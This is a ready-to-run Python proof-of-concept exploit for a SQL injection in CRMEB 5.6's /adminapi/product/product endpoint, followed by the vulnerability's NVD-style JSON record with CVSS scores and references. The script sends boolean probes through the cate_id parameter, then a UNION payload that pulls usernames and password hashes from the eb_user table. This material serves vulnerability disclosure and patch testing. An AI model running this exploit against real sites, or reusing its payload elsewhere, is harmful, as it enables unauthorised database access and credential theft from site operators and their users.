CVE-2025-11288

# CVE-2025-11288 - CRMEB V5.6 SQL Injection PoC # Vulnerable endpoint: /adminapi/product/product # Vulnerable parameter: cate_id (GET) # Author: coolcj-stack import requests # Target configuration TARGET_URL = "http://target-crmeb-site.com" ADMIN_API_PATH = "/adminapi/product/product" # Attacker credentials (low privilege required) SESSION_COOKIE = "your_admin_session_cookie_here" # SQL Injection payload via cate_id parameter # Exploits UNION-based injection to extract admin credentials INJECTION_PAYLOAD = "1' UNION SELECT id,username,password,'','','','','','','','','','','' FROM eb_user-- -" def exploit_sql_injection(): """ Exploit SQL injection in CRMEB V5.6 adminapi/product/product endpoint. The cate_id parameter is directly concatenated into SQL queries without sanitization. """ headers = { "Cookie": f"PHPSESSID={SESSION_COOKIE}", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" } params = { "cate_id": INJECTION_PAYLOAD, "page": "1", "limit": "20" } # Send malicious request to vulnerable endpoint response = requests.get( url=TARGET_URL + ADMIN_API_PATH, params=params, headers=headers ) if response.status_code == 200: print("[+] Injection successful!") print(f"[+] Response: {response.text}") # Parse and extract sensitive data from response return response.json() else: print(f"[-] Request failed with status code: {response.status_code}") return None def detect_injection(): """ Detection phase: verify the endpoint is vulnerable to SQL injection """ test_payloads = [ "1'", # Basic quote test "1' AND '1'='1", # Boolean true test "1' AND '1'='2", # Boolean false test ] headers = { "Cookie": f"PHPSESSID={SESSION_COOKIE}", } for payload in test_payloads: params = {"cate_id": payload} resp = requests.get( TARGET_URL + ADMIN_API_PATH, params=params, headers=headers ) print(f"[*] Testing payload: {payload}") print(f"[*] Response length: {len(resp.text)}") if __name__ == "__main__": print("[*] CVE-2025-11288 - CRMEB V5.6 SQL Injection Exploit") print("[*] Detecting vulnerability...") detect_injection() print("\n[*] Exploiting vulnerability...") exploit_sql_injection()

{"cve": {"id": "CVE-2025-11288", "sourceIdentifier": "[email protected]", "published": "2025-10-05T08:15:31.143", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security flaw has been discovered in CRMEB up to 5.6. This issue affects some unknown processing of the file /adminapi/product/product of the component GET Parameter Handler. Performing a manipulation of the argument cate_id results in sql injection. Remote exploitation of the attack is possible. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:crmeb:crmeb:*:*:*:*:*:*:*:*", "versionEndIncluding": "5.6", "matchCriteriaId": "16ACC5CB-CAAA-4C45-AEEE-D60ABC2D7EA4"}]}]}], "references": [{"url": "https://github.com/coolcj-stack/CRMEB-V5.6-SQL-Injection/blob/main/README.md", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.327046", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327046", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.659736", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://github.com/coolcj-stack/CRMEB-V5.6-SQL-Injection/blob/main/README.md", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Third Party Advisory"]}]}}